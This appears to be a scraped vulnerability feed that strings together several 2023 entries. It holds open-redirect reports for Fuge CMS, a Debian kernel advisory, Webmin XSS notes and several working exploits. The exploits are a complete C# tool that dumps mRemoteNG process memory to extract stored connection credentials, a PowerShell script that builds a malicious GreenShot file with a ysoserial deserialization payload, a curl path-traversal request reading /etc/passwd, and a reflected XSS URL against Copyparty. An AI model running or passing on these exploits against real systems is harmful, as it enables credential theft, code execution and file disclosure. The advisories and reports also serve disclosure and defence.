Fuge CMS v1.0 contains an Open Redirect vulnerability in member/RegisterAct.java.

**Description**

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

The vulnerability exists in the file https://github.com/fuge/cms/blob/master/src/foo/cms/action/member/RegisterAct.java where application is taking the nextUrl parameter as a user input and passing it without any validation. in next lines this nextUrl paramter is being used for redirection.

**Root Cause**

As mentioned above the file https://github.com/fuge/cms/blob/master/src/foo/cms/action/member/RegisterAct.java contains the following code:

     @RequestMapping(value = "/register.jspx", method = RequestMethod.POST)
    public String submit(String username, String email, String password,
    		CmsUserExt userExt, String captcha, String nextUrl,
    		HttpServletRequest request, HttpServletResponse response,
    		ModelMap model) throws IOException {  
    

This code takes in nextUrl as user input and passing it then this parameter is directly being used in line 110

response.sendRedirect(nextUrl);

**Steps to reproduce**

*   Compile and run the following application using java.
*   Once done, navigate to the application.
*   open /register.jspx endpoint.
*   modify the nextUrl parameter and enter the user controlled url. submit it.
*   analyze the response.

**Proof of concept**

CVE-2023-34917: Vulnerability Report - Unvalidated open redirection · Issue #3 · fuge/cms

Fuge CMS v1.0 contains an Open Redirect vulnerability via /front/ProcessAct.java.

**Description**

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

The vulnerability exists in the file https://github.com/fuge/cms/blob/master/src/foo/core/action/front/ProcessAct.java where application is taking RETURN\_URL parameter as a user input and passing it without any validation. in next lines this returnUrl paramter is being used for redirection.

**Root Cause**

As mentioned above the file https://github.com/fuge/cms/blob/master/src/foo/core/action/front/ProcessAct.java contains the following code:

    @RequestMapping(value = "/process.jspx", method = RequestMethod.GET)
    public String process(HttpServletRequest request,
    		HttpServletResponse response) {
    	String returnUrl = RequestUtils.getQueryParam(request,
    			LoginAct.RETURN_URL);
    	String authId = RequestUtils.getQueryParam(request, AUTH_KEY);
    	Authentication auth = authMng.retrieve(authId);
    	if (auth != null) {
    		authMng.storeAuthIdToSession(session, request, response, auth
    				.getId());
    	} else {
    		log.warn("Authentication id not found: {}", authId);
    	}
    	return "redirect:" + returnUrl;
    }
    

**Steps to reproduce**

*   Compile and run the following application using java.
*   navigate to /process.jspx endpoint.
*   modify the RETURN\_URL parameter and enter the user controlled url. submit it.
*   analyze the response.

**Proof of Concept**

CVE-2023-34916: Vulnerability Report - Unvalidated open redirection in ProcessAct.java · Issue #4 · fuge/cms

mRemoteNG version 1.77.3.1784-NB exploit that extracts sensitive information that is stored in memory in the clear but encrypted at rest.

    # Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory# Google Dork: -# Date: 21.07.2023# Exploit Author: Maximilian Barz# Vendor Homepage: https://mremoteng.org/# Software Link: https://mremoteng.org/download# Version: mRemoteNG <= v1.77.3.1784-NB# Tested on: Windows 11# CVE : CVE-2023-30367/*Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users tostore and manage multi-protocol connection configurations to remotely connect to systems.mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-devloads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,even if no connection has been established yet. This allows attackers to access contents of configuration files in plain textthrough a memory dump and thus compromise user credentials when no custom password encryption key has been set.This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper*/using System;using System.Collections;using System.Collections.Generic;using System.Diagnostics;using System.IO;using System.Reflection;using System.Runtime.InteropServices;using System.Text;using System.Text.RegularExpressions;namespace mRemoteNGDumper{public static class Program{public enum MINIDUMP_TYPE{MiniDumpWithFullMemory = 0x00000002}[StructLayout(LayoutKind.Sequential, Pack = 4)]public struct MINIDUMP_EXCEPTION_INFORMATION{public uint ThreadId;public IntPtr ExceptionPointers;public int ClientPointers;}[DllImport("kernel32.dll")]static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);[DllImport("Dbghelp.dll")]static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);static void Main(string[] args){string input;bool configfound = false;StringBuilder filesb;StringBuilder linesb;List<string> configs = new List<string>();Process[] localByName = Process.GetProcessesByName("mRemoteNG");if (localByName.Length == 0) {Console.WriteLine("[-] No mRemoteNG process was found. Exiting");System.Environment.Exit(1);}string assemblyPath = Assembly.GetEntryAssembly().Location;Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";FileStream procdumpFileStream = File.Create(dumpFileName);MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();// A full memory dump is necessary in the case of a managed application, other wise no information// regarding the managed code will be availableMINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);procdumpFileStream.Close();filesb = new StringBuilder();Console.WriteLine("[+] Searching for configuration files in memory dump.");using (StreamReader reader = new StreamReader(dumpFileName)){while (reader.Peek() >= 0){input = reader.ReadLine();string pattern = @"(\<Node)(.*)(?=\/>)\/>";Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);if (m.Success){configfound = true;foreach (string config in m.Value.Split('>')){configs.Add(config);}}}reader.Close();if (configfound){string currentDir = System.IO.Directory.GetCurrentDirectory();string dumpdir = currentDir + "/dump";if (!Directory.Exists(dumpdir)){Directory.CreateDirectory(dumpdir);}string savefilepath;for (int i =0; i < configs.Count;i++){if (!string.IsNullOrEmpty(configs[i])){savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);using (StreamWriter writer = new StreamWriter(savefilepath)){writer.Write(configs[i]+'>');writer.Close();}}}Console.WriteLine("[+] Done!");Console.WriteLine("[+] Deleting memorydump file!");File.Delete(dumpFileName);Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" );}else{Console.WriteLine("[-] No configuration file found in memorydump. Exiting");Console.WriteLine("[+] Deleting memorydump file!");File.Delete(dumpFileName);}}}}}

mRemoteNG 1.77.3.1784-NB Sensitive Information Extraction

Debian Linux Security Advisory 5461-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5461-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 30, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-3390 CVE-2023-3610 CVE-2023-20593

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-3390

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    error path handling may result in denial of service or privilege  
    escalation.

CVE-2023-3610

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    refcount handling on the table and chain destroy path may result in  
    denial of service or privilege escalation.

CVE-2023-20593

    Tavis Ormandy discovered that under specific microarchitectural  
    circumstances, a vector register in AMD "Zen 2" CPUs may not be  
    written to 0 correctly.  This flaw allows an attacker to leak  
    sensitive information across concurrent processes, hyper threads  
    and virtualized guests.

    For details please refer to  
    <https://lock.cmpxchg8b.com/zenbleed.html> and  
    <https://github.com/google/security-research/security/advisories/GHSA-v6wh-rxpg-cmm8>.

    This issue can also be mitigated by a microcode update through the  
    amd64-microcode package or a system firmware (BIOS/UEFI) update.  
    However, the initial microcode release by AMD only provides  
    updates for second generation EPYC CPUs.  Various Ryzen CPUs are  
    also affected, but no updates are available yet.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.10.179-3.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTGCxhfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q2Lw//W7eGT2uTxzgwGK1ivLNtzu4VnZfX3luCzLc2Gy49YhSTPfepMsR+EZWU  
zMfxMwXp7HcgUUAj6VnKPSYt0lmauDVy9POUl20nOzM8hFScemhFJ+DVSeeJrfhR  
RPUroaJNLpJS1QjYJisi2tjKnoc8IhCkw/X88I4S4dAzekmRTLeEdeAIP0jyRYDi  
Pd+nW8vR2bcMG4jAaA/lBu17FgysEpHMleMzr9Ocw7k6eqlcIo12w36Ml51MmXZW  
Lxr7XKrAM6p9TuL+BY0i4FvW0f7hvbpMdhIaAzUf+7LQj9Tn5rGNaHB+NhLO6HB1  
spOXfZLVCM10LDCDIUR3lz0hUNI/10bKtoarbvoygevVzuvGWLTmI5P/uei9Bv1m  
jqd+FOtkZuYsuQzvzIrVISGL2ltpD3055mBaOJWIBrDl+mrR88m+LAMA5iJiCuvh  
M6rfJgraQFHeMFJi1ojDgNyyRaasxOKXRcWAYOvgZ1XKLfJ10OkieYq5CO1c7iKW  
4NkwBklDP8wEHoZHMEY3KnLnGcNO93wBBGcQVIBlMXu0IKlf/BT0Rcj0ynz5g5N1  
MgvGAJio+yTr4QWRz/GQRtF3Lf5r4Ezib/Y2Qv9PUbVWzmmiUyQsATjcp9d+sLSB  
hJhR9+9d4DefRAPGFOSCA6d01qL8HygsvKyyGB4C1DdbSlT3APc=  
=3UcB  
-----END PGP SIGNATURE-----

Debian Security Advisory 5461-1

GreenShot version 1.2.10 suffers from an insecure deserialization arbitrary code execution vulnerability.

    # Exploit Title: GreenShot  1.2.10 - Insecure Deserialization Arbitrary Code Execution# Date: 26/07/2023# Exploit Author: p4r4bellum# Vendor Homepage: https://getgreenshot.org# Software Link: https://getgreenshot.org/downloads/# Version: 1.2.6.10# Tested on: windows 10.0.19045 N/A build 19045# CVE : CVE-2023-34634## GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format# A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software# On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file# will lead to arbitrary code execution## Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net./ysoserial.exe -f BinaryFormatter -g WindowsIdentity  -c "calc" --outputpath payload.bin -o raw#load the payload$payload = Get-Content .\payload.bin -Encoding Byte# retrieve the length of the payload$length = $payload.Length# load the required assembly to craft a PNG fileAdd-Type -AssemblyName System.Drawing# the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell$filename = "$home\poc.greenshot"$bmp = new-object System.Drawing.Bitmap 250,61 $font = new-object System.Drawing.Font Consolas,24 $brushBg = [System.Drawing.Brushes]::Green $brushFg = [System.Drawing.Brushes]::Black $graphics = [System.Drawing.Graphics]::FromImage($bmp) $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) $graphics.DrawString('POC Greenshot',$font,$brushFg,10,10) $graphics.Dispose() $bmp.Save($filename) # append the payload to the PNG file$payload | Add-Content -Path $filename -Encoding Byte -NoNewline # append the length of the payload[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding  Byte -NoNewline# append the signature"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii# launch greenshot. Calc.exe should be executedInvoke-Item  $filename

GreenShot 1.2.10 Arbitrary Code Execution

Copyparty version 1.8.2 suffers from a directory traversal vulnerability.

    # Exploit Title: copyparty 1.8.2 - Directory Traversal# Date: 14/07/2023# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)# Vendor Homepage: https://github.com/9001/copyparty/# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2# Version: <=1.8.2# Tested on: Debian Linux# CVE : CVE-2023-37474#DescriptionCopyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.#POCcurl -i -s -k -X  GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'

Copyparty 1.8.2 Directory Traversal

Copyparty version 1.8.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)# Date: 23/07/2023# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)# Vendor Homepage: https://github.com/9001/copyparty/# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6# Version: <=1.8.6# Tested on: Debian Linux# CVE : CVE-2023-38501#DescriptionCopyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.#POChttps://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E

Copyparty 1.8.6 Cross Site Scripting

An issue was discovered in Webmin 2.021. One can exploit a stored Cross-Site Scripting (XSS) attack to achieve Remote Command Execution (RCE) through the Users and Group's real name parameter.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-38303: Webmin-2.021/CVE-2023-38303 at main · jaysharma786/Webmin-2.021

An issue was discovered in Webmin 2.021. A Stored Cross-Site Scripting (XSS) vulnerability was discovered in the Users and Groups functionality. The vulnerability occurs when an authenticated user adds a new user and inserts an XSS payload into the user's real name.

CVE-2023-38307: Webmin-2.021/CVE-2023-38307 at main · jaysharma786/Webmin-2.021

An issue was discovered in Webmin 2.021. A Cross-Site Scripting (XSS) vulnerability was discovered in the HTTP Tunnel functionality when handling third-party domain URLs. By providing a crafted URL from a third-party domain, an attacker can inject malicious code. leading to the execution of arbitrary JavaScript code within the context of the victim's browser.

Tag

#git